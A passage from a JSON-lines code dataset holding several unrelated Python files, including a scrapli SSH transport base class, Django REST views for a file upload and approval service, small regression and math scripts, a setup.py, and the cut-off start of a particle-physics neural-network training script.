DependencyDB(py_ver, pypi_deps_db_data_dir)\n generator = OverlaysGenerator(\n py_ver,\n nixpkgs_commit,\n nixpkgs_tarball_sha256,\n nixpkgs,\n pypi_fetcher_commit,\n pypi_fetcher_tarball_sha256,\n disable_checks,\n ResolvelibResolver(nixpkgs, deps_db),\n prefer_nixpkgs=prefer_nixpkgs,\n )\n reqs = parse_reqs(requirements)\n expr = generator.generate(reqs)\n with open(out_file, 'w') as f:\n f.write(expr)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"mach_nix/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"543618382","text":"import pandas\nfrom pandas import DataFrame\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error, r2_score\nimport numpy as np\n\ndatos = pandas.read_csv('data/problema_3.csv')\ndf = DataFrame(datos)\n\nx = df[['manual']] # variable(s) independiente(s)\ny = df['automática'] # variable dependiente\nnitrato = 100\n\nlineal = linear_model.LinearRegression()\nlineal.fit(x, y)\n\ny_adjusted = lineal.predict(x)\ny_predicted = lineal.predict([[nitrato]])\n\nrmse = np.sqrt(mean_squared_error(y, y_adjusted))\nr2 = r2_score(y, y_adjusted)\n\nprint(f'Resultado regresión: {round(y_predicted[0], 2)}')\nprint(f'R2: {round(r2, 2)}')\nprint(f'Error medio: ±{round(rmse, 2)}')\n\n","sub_path":"problema_3.py","file_name":"problema_3.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"294123060","text":"import unittest\n\nfrom autocompleteSystem.autocomplete import autocomplete\n\n\nclass MyTestCase(unittest.TestCase):\n def test1(self):\n s = \"de\"\n queries = [\"dog\", \"deer\", \"deal\"]\n\n expected = {\"deer\", \"deal\"}\n actual = set(autocomplete(s, queries))\n self.assertEqual(expected, actual)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"autocompleteSystem/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"304472406","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"brudercropper\",\n version=\"0.1.6\",\n author=\"Niggo\",\n description=\"Croppt Zeug auf 62mm für Bruderlabeldrucker\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=setuptools.find_packages(),\n install_requires=[\n \"imutils==0.5.3\",\n \"numpy==1.18.2\",\n \"opencv-python==4.2.0.34\",\n \"Pillow==7.1.1\",\n \"pytesseract==0.3.3\",\n \"python-barcode==0.11.0\"\n ],\n classifiers=[\n # \"Development Status :: 3 - Alpha\"\n \"Programming Language :: Python :: 3\",\n # \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.5',\n entry_points={\n 'console_scripts': [\n 'brudercrop = brudercropper.crop:main',\n ],\n }\n)","sub_path":"pypi_install_script/brudercropper-0.1.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"116298423","text":"\"\"\"scrapli.transport.transport\"\"\"\nimport time\nfrom abc import ABC, abstractmethod\nfrom concurrent.futures import ThreadPoolExecutor\nfrom datetime import datetime\nfrom logging import getLogger\nfrom threading import Lock\nfrom typing import Optional\n\nfrom scrapli.exceptions import ScrapliKeepaliveFailure\n\nLOG = getLogger(\"transport\")\n\n\nclass Transport(ABC):\n def __init__(\n self,\n host: str = \"\",\n port: int = 22,\n timeout_socket: int = 5,\n timeout_transport: int = 5,\n timeout_exit: bool = True,\n keepalive: bool = False,\n keepalive_interval: int = 30,\n keepalive_type: str = \"network\",\n keepalive_pattern: str = \"\\005\",\n ) -> None:\n \"\"\"\n Transport Base Object\n\n Args:\n host: host ip/name to connect to\n port: port to connect to\n timeout_socket: timeout for establishing socket in seconds\n timeout_transport: timeout for ssh|telnet transport in seconds\n timeout_exit: True/False close transport if timeout encountered. If False and keepalives\n are in use, keepalives will prevent program from exiting so you should be sure to\n catch Timeout exceptions and handle them appropriately\n keepalive: whether or not to try to keep session alive\n keepalive_interval: interval to use for session keepalives\n keepalive_type: network|standard -- 'network' sends actual characters over the\n transport channel. This is useful for network-y type devices that may not support\n 'standard' keepalive mechanisms. 'standard' attempts to use whatever 'standard'\n keepalive mechanisms are available in the selected transport mechanism. Check the\n transport documentation for details on what is supported and/or how it is\n implemented for any given transport driver\n keepalive_pattern: pattern to send to keep network channel alive. Default is\n u'\\005' which is equivalent to 'ctrl+e'. This pattern moves cursor to end of the\n line which should be an innocuous pattern. This will only be entered *if* a lock\n can be acquired. This is only applicable if using keepalives and if the keepalive\n type is 'network'\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n self.host: str = host\n self.port: int = port\n self.timeout_socket: int = timeout_socket\n self.timeout_transport: int = timeout_transport\n self.timeout_exit: bool = timeout_exit\n self.keepalive: bool = keepalive\n self.keepalive_interval: int = keepalive_interval\n self.keepalive_type: str = keepalive_type\n self.keepalive_pattern: str = keepalive_pattern\n\n self.session_lock: Lock = Lock()\n\n def __bool__(self) -> bool:\n \"\"\"\n Magic bool method for Socket\n\n Args:\n N/A\n\n Returns:\n bool: True/False if socket is alive or not\n\n Raises:\n N/A\n\n \"\"\"\n return self.isalive()\n\n def __str__(self) -> str:\n \"\"\"\n Magic str method for Transport\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n return f\"Transport Object for host {self.host}\"\n\n def __repr__(self) -> str:\n \"\"\"\n Magic repr method for Transport\n\n Args:\n N/A\n\n Returns:\n str: repr for class object\n\n Raises:\n N/A\n\n \"\"\"\n class_dict = self.__dict__.copy()\n class_dict[\"auth_password\"] = \"********\"\n return f\"Transport {class_dict}\"\n\n @abstractmethod\n def open(self) -> None:\n \"\"\"\n Open channel, acquire pty, request interactive shell\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n @abstractmethod\n def close(self) -> None:\n \"\"\"\n Close session and socket\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n @abstractmethod\n def isalive(self) -> bool:\n \"\"\"\n Check if socket is alive and session is authenticated\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n @abstractmethod\n def read(self) -> bytes:\n \"\"\"\n Read data from the channel\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n @abstractmethod\n def write(self, channel_input: str) -> None:\n \"\"\"\n Write data to the channel\n\n Args:\n channel_input: string to send to channel\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n @abstractmethod\n def set_timeout(self, timeout: Optional[int] = None) -> None:\n \"\"\"\n Set session timeout\n\n Args:\n timeout: timeout in seconds\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n\n def _session_keepalive(self) -> None:\n \"\"\"\n Spawn keepalive thread for transport session\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n if not self.keepalive:\n return\n pool = ThreadPoolExecutor()\n if self.keepalive_type == \"network\":\n pool.submit(self._keepalive_network)\n else:\n pool.submit(self._keepalive_standard)\n\n def _keepalive_network(self) -> None:\n \"\"\"\n Send \"in band\" keepalives to devices.\n\n Generally used with \"network\" devices which do not have native keepalive support. This will\n try to acquire a session lock and send an innocuous character -- such as CTRL+E -- to keep\n the device \"exec-timeout\" (in network-y words) from expiring.\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n ScrapliKeepaliveFailure: if scrapli cant unlock and send keepalive in less than 3 *\n the keepalive_interval\n\n \"\"\"\n lock_counter = 0\n last_keepalive = datetime.now()\n while True:\n if not self.isalive():\n return\n diff = datetime.now() - last_keepalive\n if diff.seconds >= self.keepalive_interval:\n if not self.session_lock.locked():\n LOG.debug(\n f\"Sending 'network' keepalive with pattern {repr(self.keepalive_pattern)}.\"\n )\n lock_counter = 0\n self.session_lock.acquire()\n self.write(self.keepalive_pattern)\n self.session_lock.release()\n last_keepalive = datetime.now()\n else:\n lock_counter += 1\n if lock_counter >= 3:\n LOG.info(f\"Keepalive thread missed {lock_counter} consecutive keepalives.\")\n if diff.seconds > self.keepalive_interval * 3:\n msg = (\n \"Keepalive thread has failed to send a keepalive in greater than three \"\n \"times the keepalive interval!\"\n )\n LOG.critical(msg)\n raise ScrapliKeepaliveFailure(msg)\n time.sleep(self.keepalive_interval / 10)\n\n @abstractmethod\n def _keepalive_standard(self) -> None:\n \"\"\"\n Send \"out of band\" (protocol level) keepalives to devices.\n\n Args:\n N/A\n\n Returns:\n N/A # noqa: DAR202\n\n Raises:\n N/A\n\n \"\"\"\n","sub_path":"scrapli/transport/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":7934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371367731","text":"import logging\n\nfrom django.conf import settings\nfrom django.db.models.functions import Concat\nfrom django.db.models import Count, F, Value, CharField\nfrom django.http.response import FileResponse\nfrom rest_framework import status, viewsets, mixins, filters\nfrom rest_framework.decorators import action\nfrom rest_framework.parsers import MultiPartParser\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom filters.mixins import FiltersMixin\n\nfrom server.pj.email_service import email\nfrom server.pj.models import File, Vendor, Stakeholder, DataSource, Note, Todo\nfrom server.pj.serializers import (FileSerializer, FileUploadSerializer,\n VendorSerializer, VendorValidateSerializer, StakeholderSerializer,\n DataSourceSerializer, NoteSerializer, TodoSerializer)\nfrom server.pj.store import upload, retrieve, create_folders\nfrom server.pj.permissions import get_permission_classes\nfrom server.pj.ordering import MappedOrderFilter\nfrom server.pj.throttles import get_throttle_classes\n\nlogger = logging.getLogger(__name__)\n\ndef parse_list(val):\n return val.split(',')\n\ndef validate_int(num):\n try:\n return int(num)\n except ValueError:\n return 0\n \nstatus_whitelist = [\n File.CLEAN,\n File.APPROVED,\n File.TRANSFERRED\n]\n\nstatus_email_notification = [\n File.QUARANTINED,\n File.FAILED\n]\n\nclass FileViewSet(\n FiltersMixin,\n mixins.ListModelMixin,\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n viewsets.GenericViewSet\n):\n \"\"\"View set to interact with the file model.\"\"\"\n permission_classes = get_permission_classes('pj', 'file', anon_actions=('upload',))\n serializer_class = FileSerializer\n queryset = File.objects.all().annotate(url=Concat(F('location'), Value('/'), F('status'), Value('/'), F('key'), output_field=CharField()))\n pagination_class = LimitOffsetPagination\n throttle_classes = get_throttle_classes('upload')\n filter_backends = (MappedOrderFilter,)\n filter_mappings = {\n 'code': 'vendor__code',\n 'name': 'name__icontains',\n 'location': 'location__icontains',\n 'status': 'status__in',\n 'size': 'size',\n 'url': 'url__icontains',\n 'vendor': 'vendor__name__icontains',\n 'submitter': 'submitter__icontains',\n 'date_uploaded_after': 'date_uploaded__gte',\n 'date_uploaded_before': 'date_uploaded__lte',\n 'date_approved_after': 'date_approved__gte',\n 'date_approved_before': 'date_approved__lte',\n 'key': 'key'\n }\n filter_value_transformations = {\n 'status': parse_list,\n 'size': validate_int\n }\n ordering_fields = ('name', 'location', 'size', 'vendor', 'submitter', 'date_uploaded', 'date_approved', 'status', 'url')\n ordering_mappings = {\n 'vendor': 'vendor__name'\n }\n ordering = ('-date_uploaded',)\n\n @action(\n detail=False,\n methods=['POST'],\n parser_classes=(MultiPartParser,),\n serializer_class=FileUploadSerializer)\n def upload(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n vendor = serializer.validated_data['vendor']\n submitter = serializer.validated_data['submitter']\n successful_urls = []\n names_changed = []\n for uploaded_file in serializer.validated_data['file']:\n # The s3 key needs to follow certain rules: https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html\n f = File.objects.create_file(uploaded_file, vendor, submitter)\n if f.name != uploaded_file.name:\n names_changed.append([uploaded_file.name, f.name])\n\n if f.location:\n try:\n url = f.get_url()\n upload(url, uploaded_file)\n successful_urls.append(url)\n except Exception as e:\n logger.error(f'Upload to {f.location} failed: {e}', extra={'request': request})\n f.delete()\n return Response('File upload failed', status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n else:\n logger.error('No upload location defined, skipping upload', extra={'request': request})\n f.message = 'No upload location defined, skipping upload'\n f.status = File.FAILED\n f.save()\n\n try:\n url_list = \"\\n\".join(successful_urls)\n body = f'Files uploaded successfully by {vendor.name} - {submitter}\\n\\n{url_list}'\n logger.info(body, extra={'request': request})\n poc_emails = [e for e in vendor.pocs.all().values_list('email', flat=True) if e]\n if not email(f'{len(successful_urls)} file(s) uploaded to puddle-jumper', body, poc_emails):\n logger.error('No emails were sent for file upload', extra={'request': request})\n except Exception as e:\n logger.error(f'Failed to send file upload email: {e}', extra={'request': request})\n\n return Response(names_changed, status=status.HTTP_202_ACCEPTED)\n\n @action(detail=True, methods=['GET'])\n def data(self, request, pk=None):\n f = self.get_object()\n if not f.status in status_whitelist:\n return Response('File has not been successfully virus scanned', status=status.HTTP_400_BAD_REQUEST)\n\n stream = retrieve(f.get_url())\n\n download = 'download' in request.query_params\n\n return FileResponse(stream, filename=f.name, as_attachment=download)\n\n @action(detail=True, methods=['POST'])\n def status(self, request, pk=None):\n \"\"\"\n This route is used by jumper cables to update the django file instance as it is processed\n \"\"\"\n f = self.get_object()\n file_status = request.data['status']\n if f.status == File.REJECTED:\n # If the file already has rejected status, move file appropriately\n f, s = f.reject(request, file_status)\n if not s:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n f = FileSerializer(f)\n return Response(f.data)\n\n message = request.data.get('message', None)\n data = {'status': file_status}\n if message is not None:\n data['message'] = message\n\n serializer = FileSerializer(f, data=data, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n message = f'File {f.key} status change to {file_status}'\n logger.info(message, extra={'request': request})\n\n if file_status in status_email_notification:\n try:\n if not email(f'File {f.key} updated', message):\n logger.error('No emails were sent for status update', extra={'request': request})\n except Exception as e:\n # Think we just want to log an email failed and not return 500 status\n logger.error(f'Failed to send status update email: {e}', extra={'request': request})\n\n if file_status == File.CLEAN and f.vendor.approves(f):\n _, succeeded = f.approve(request)\n if not succeeded:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n \n return Response(serializer.data)\n\n \n @action(detail=False, methods=['POST'])\n def retry_bulk(self, request):\n files = self.get_queryset().filter(pk__in=request.data, status__in=[File.FAILED, File.TRANSFERRED])\n if files.count() == 0:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n results = [f.reset(request) for f in files]\n succeeded = [f.pk for f, s in results if s]\n return Response({\n 'succeeded': succeeded,\n 'failed': [pk for pk in request.data if pk not in succeeded]\n }, status=status.HTTP_200_OK if succeeded else status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n @action(detail=True, methods=['POST'])\n def retry(self, request, pk=None):\n f = self.get_object()\n fragments = request.data\n if f.status not in [File.FAILED, File.TRANSFERRED]:\n return Response('File must have failed or transferred status to attempt a retry', status=status.HTTP_400_BAD_REQUEST)\n if f.status == File.TRANSFERRED:\n f.fragments = fragments\n f.save()\n\n f, succeeded = f.reset(request)\n if not succeeded:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n \n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['POST'])\n def approve_bulk(self, request):\n files = self.get_queryset().filter(pk__in=request.data, status=File.CLEAN)\n if files.count() == 0:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n results = [f.approve(request) for f in files]\n succeeded = [f.pk for f, s in results if s]\n return Response({\n 'succeeded': succeeded,\n 'failed': [pk for pk in request.data if pk not in succeeded]\n }, status=status.HTTP_200_OK if succeeded else status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n @action(detail=True, methods=['POST'])\n def approve(self, request, pk=None):\n f = self.get_object()\n if not f.status == File.CLEAN:\n return Response('File must have a Clean status to approve', status=status.HTTP_400_BAD_REQUEST)\n\n f, succeeded = f.approve(request)\n if not succeeded:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n \n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['POST'])\n def reject_bulk(self, request):\n files = self.get_queryset().filter(pk__in=request.data['pks'], status__in=[File.CLEAN, File.UNSCANNED])\n if files.count() == 0:\n return Response('File must have a clean or unscanned status to reject', status=status.HTTP_400_BAD_REQUEST)\n\n results = [f.reject(request) for f in files]\n succeeded = [f.pk for f, s in results if s]\n return Response({\n 'succeeded': succeeded,\n 'failed': [pk for pk in request.data['pks'] if pk not in succeeded]\n }, status=status.HTTP_200_OK if succeeded else status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n @action(detail=True, methods=['POST'])\n def reject(self, request, pk=None):\n f = self.get_object()\n if f.status not in [File.CLEAN, File.UNSCANNED]:\n return Response('File must have a clean or unscanned status to reject', status=status.HTTP_400_BAD_REQUEST)\n\n f, succeeded = f.reject(request)\n if not succeeded:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['POST'])\n def delete_bulk(self, request):\n files = self.get_queryset().filter(pk__in=request.data)\n if files.count() == 0:\n return Response(status=status.HTTP_200_OK)\n \n results = [f.delete_file(request) for f in files]\n succeeded = [pk for pk, s in results if s]\n return Response({\n 'succeeded': succeeded,\n 'failed': [pk for pk in request.data if pk not in succeeded]\n }, status=status.HTTP_200_OK if succeeded else status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n def destroy(self, instance, pk=None):\n _, succeeded = self.get_object().delete_file(self.request)\n return Response(status=status.HTTP_204_NO_CONTENT if succeeded else status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n def perform_create(self, serializer):\n extra = {}\n if not serializer.validated_data.get('priority'):\n vendor = serializer.validated_data['vendor']\n extra['priority'] = vendor.priority\n serializer.save(**extra)\n\nclass StakeholderViewSet(FiltersMixin, viewsets.ModelViewSet):\n queryset = Stakeholder.objects.all()\n serializer_class = StakeholderSerializer\n permission_classes = get_permission_classes('pj', 'stakeholder')\n pagination_class = LimitOffsetPagination\n filter_backends = (filters.OrderingFilter,)\n filter_mappings = {\n 'name': 'name__icontains',\n 'phone': 'phone',\n 'email': 'email_icontains'\n }\n ordering_fields = ('name', 'phone', 'email')\n ordering = ('name',)\n\nclass VendorViewSet(FiltersMixin, viewsets.ModelViewSet):\n queryset = Vendor.objects.all()\n serializer_class = VendorSerializer\n permission_classes = get_permission_classes('pj', 'vendor', anon_actions=('validate',))\n throttle_classes = get_throttle_classes('validate')\n pagination_class = LimitOffsetPagination\n filter_backends = (filters.OrderingFilter,)\n filter_mappings = {\n 'name': 'name__icontains',\n 'code': 'code__icontains',\n 'date_added_after': 'date_added__gte',\n 'date_added_before': 'date_added__lte',\n 'file_count': 'file_count',\n 'pocs': 'pocs__name__icontains',\n 'auto_approve': 'auto_approve'\n }\n filter_value_transformations = {\n 'auto_approve': lambda x: x.lower() in ('true', 'yes')\n }\n ordering_fields = ('name', 'code', 'date_added', 'file_count', 'auto_approve')\n ordering = ('name',)\n\n def get_queryset(self):\n # Need to annotate queryset for ordering/filtering\n return self.queryset.annotate(file_count=Count('file'))\n\n def perform_create(self, serializer):\n if settings.UPLOAD_LOCATION:\n create_folders(settings.UPLOAD_LOCATION, serializer.validated_data['short_name'], File.STATUS_CHOICES)\n serializer.save()\n\n @action(\n detail=False,\n methods=['POST'],\n serializer_class=VendorValidateSerializer)\n def validate(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n return Response(Vendor.objects.filter(code__iexact=serializer.validated_data['code']).exists())\n\nclass DataSourceViewSet(FiltersMixin, viewsets.ModelViewSet):\n queryset = DataSource.objects.all()\n serializer_class = DataSourceSerializer\n permission_classes = get_permission_classes('pj', 'datasource')\n pagination_class = LimitOffsetPagination\n filter_backends = (filters.OrderingFilter,)\n filter_mappings = {\n 'name': 'name__icontains',\n 'status': 'status',\n 'priority': 'priority',\n 'theme': 'theme__icontains',\n 'info': 'info__icontains',\n 'date_ingest': 'date_ingest__icontains',\n }\n ordering_fields = ('name', 'status', 'priority', 'theme', 'info', 'date_ingest')\n ordering = ('name',)\n\n @action(detail=False, methods=['POST'])\n def delete_bulk(self, request):\n self.get_queryset().filter(pk__in=request.data).delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=False, methods=['POST'])\n def suggestions(self, request):\n if not request.data.get('key') or not request.data.get('value'):\n Response(\"Need to submit a key and value\", status=status.HTTP_400_BAD_REQUEST)\n key = request.data['key']\n value = request.data['value']\n values = self.get_queryset() \\\n .filter(**{f'{key}__icontains': value}) \\\n .exclude(**{key:\"\"}) \\\n .distinct(key) \\\n .values_list(key, flat=True) \\\n [:10]\n return Response(values)\n\nclass NoteViewSet(FiltersMixin, viewsets.ModelViewSet):\n queryset = Note.objects.all()\n serializer_class = NoteSerializer\n permission_classes = get_permission_classes('pj', 'note')\n pagination_class = LimitOffsetPagination\n filter_backends = (filters.OrderingFilter,)\n filter_mappings = {\n 'note': 'note__icontains',\n 'source': 'data_source__pk'\n }\n ordering_fields = ('note',)\n ordering = ('note',)\n\n def perform_create(self, serializer):\n serializer.save(created_by=self.request.user)\n\nclass TodoViewSet(FiltersMixin, viewsets.ModelViewSet):\n queryset = Todo.objects.all()\n serializer_class = TodoSerializer\n permission_classes = get_permission_classes('pj', 'todo')\n pagination_class = LimitOffsetPagination\n filter_backends = (filters.OrderingFilter,)\n filter_mappings = {\n 'text': 'text__icontains',\n }\n ordering_fields = ('text',)\n ordering = ('text',)\n\n def perform_create(self, serializer):\n serializer.save(created_by=self.request.user)\n","sub_path":"server/pj/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"547542815","text":"import math\n\n\n# c^2 = a^2 + b^2 - 2*a*b*cos(c)\ndef give_triang(per):\n def isSqrt(x):\n y = math.sqrt(x)\n return int(y) if y == int(y) else None\n\n res = 0\n for a in range(1, per // 2):\n for b in range(a, per // 2):\n c = isSqrt(a ** 2 + b ** 2 + a * b)\n if c is not None and a + b + c <= per:\n res += 1\n return res\n\n\nprint(give_triang(80))\n","sub_path":"codewar/2021/5/Integer_triangles.py","file_name":"Integer_triangles.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"273361881","text":"import matplotlib\n\nmatplotlib.use('Agg')\nimport os\nimport pandas as pd\nimport numpy as np\nimport math\nfrom dfConvert import convertTree\n\nfrom pandasPlotting.Plotter import Plotter\nfrom pandasPlotting.dfFunctions import expandArrays\nfrom pandasPlotting.dtFunctions import featureImportance\nfrom MlClasses.MlData import MlData\nfrom MlClasses.Bdt import Bdt\nfrom MlClasses.Dnn import Dnn\nfrom MlClasses.ComparePerformances import ComparePerformances\n\nfrom MlFunctions.DnnFunctions import significanceLoss, significanceLossInvert, significanceFull, asimovSignificanceLoss, \\\n asimovSignificanceLossInvert, asimovSignificanceFull, truePositive, falsePositive\nfrom linearAlgebraFunctions import gram, addGramToFlatDF\nfrom root_numpy import rec2array\nimport argparse\n\n\"\"\"\"\nParse the argument from command line\n\"\"\"\nparser = argparse.ArgumentParser(description='Name of job')\nparser.add_argument('job_name', type=basestring, help='name of job to be executed')\nparser.add_argument('config_file_path', type=basestring, help='path to the configuration file')\n\nargs = parser.parse_args()\n\n# 1. Read the config file\n# 2. Parse the config file\n# 3 Assign for each variables the correct value\n# 4 PUT the pathes of input/ output/ plotting/ plotting type to the config\n\nnInputFiles = 100\nlimitSize = 400000 # Make this an integer N_events if you want to limit input\n\n# Use these to calculate the significance when it's used for training\n# Taken from https://twiki.cern.ch/twiki/bin/view/CMS/SummerStudent2017#SUSY\n# (dependent on batch size)\n\n\nlumi = 30. # luminosity in /fb\nexpectedSignal = 17.6 * 0.059 * lumi # cross section of stop sample in fb times efficiency measured by Marco\nexpectedBkgd = 844000. * 8.2e-4 * lumi # cross section of ttbar sample in fb times efficiency measured by Marco\nsystematic = 0.1 # systematic for the asimov signficance\n\nmakeDfs = False\nsaveDfs = False # Save the dataframes if they're remade\n\nmakePlots = False\n\nprepareInputs = False\naddGramMatrix = False\n\n# ML options\nplotFeatureImportances = True\ndoBDT = False\ndoDNN = True\ndoCrossVal = True\nmakeLearningCurve = True\ndoGridSearch = True # if this is true do a grid search, if not use the configs\n\ndoRegression = True\nregressionVars = ['MT2W'] # ,'HT']\n\nnormalLoss = True\nsigLoss = True\nsigLossInvert = True\nasimovSigLoss = False\nasimovSigLossInvert = True\n\n# The first name of any object/file/data to be stored\nVORNAME = args.job_name\n\n# If not doing the grid search\ndnnConfigs = {\n # 'dnn':{'epochs':100,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn_batch128':{'epochs':40,'batch_size':128,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn_batch2048':{'epochs':40,'batch_size':2048,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0]},\n 'dnn_batch4096': {'epochs': 80, 'batch_size': 4096, 'dropOut': None, 'l2Regularization': None,\n 'hiddenLayers': [1.0]},\n # 'dnn_batch1024':{'epochs':40,'batch_size':1024,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn_batch8192':{'epochs':40,'batch_size':8192,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn2l':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0,1.0]},\n # 'dnn3l':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0,1.0,1.0]},\n # 'dnn3l_batch1024':{'epochs':40,'batch_size':1024,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0,1.0,1.0]},\n # 'dnn5l':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[1.0,1.0,1.0,1.0,1.0]},\n # 'dnn_2p0n':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[2.0]},\n # 'dnn2l_2p0n':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[2.0,2.0]},\n # 'dnn3l_2p0n':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn4l_2p0n':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0,2.0]},\n # 'dnn5l_2p0n':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':None,'hiddenLayers':[2.0,2.0,2.0,2.0,2.0]},\n\n # 'dnn_l2Reg0p01':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[1.0]},\n # 'dnn2l_l2Reg0p01':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[1.0,1.0]},\n # 'dnn3l_l2Reg0p01':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[1.0,1.0,1.0]},\n # 'dnn5l_l2Reg0p01':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[1.0,1.0,1.0,1.0,1.0]},\n # 'dnn2l_2p0n_l2Reg0p01':{'epochs':40,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[2.0,2.0]},\n # 'dnn3l_2p0n_l2Reg0p01':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[2.0,2.0,2.0]},\n # 'dnn4l_2p0n_l2Reg0p01':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[2.0,2.0,2.0,2.0]},\n # 'dnn5l_2p0n_l2Reg0p01':{'epochs':50,'batch_size':32,'dropOut':None,'l2Regularization':0.1,'hiddenLayers':[2.0,2.0,2.0,2.0,2.0]},\n\n # 'dnndo0p5':{'epochs':10,'batch_size':32,'dropOut':0.5,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn2ldo0p5':{'epochs':10,'batch_size':32,'dropOut':0.5,'l2Regularization':None,'hiddenLayers':[1.0,0.5]},\n # 'dnndo0p2':{'epochs':30,'batch_size':32,'dropOut':0.2,'l2Regularization':None,'hiddenLayers':[1.0]},\n # 'dnn2ldo0p2':{'epochs':30,'batch_size':32,'dropOut':0.2,'l2Regularization':None,'hiddenLayers':[1.0,1.0]},\n # 'dnn3ldo0p2':{'epochs':30,'batch_size':32,'dropOut':0.2,'l2Regularization':None,'hiddenLayers':[1.0,1.0,1.0]},\n # 'dnnSmall':{'epochs':20,'batch_size':32,'dropOut':None,'l2Regularization':None,'l2Regularization':None,'hiddenLayers':[0.3]},\n # 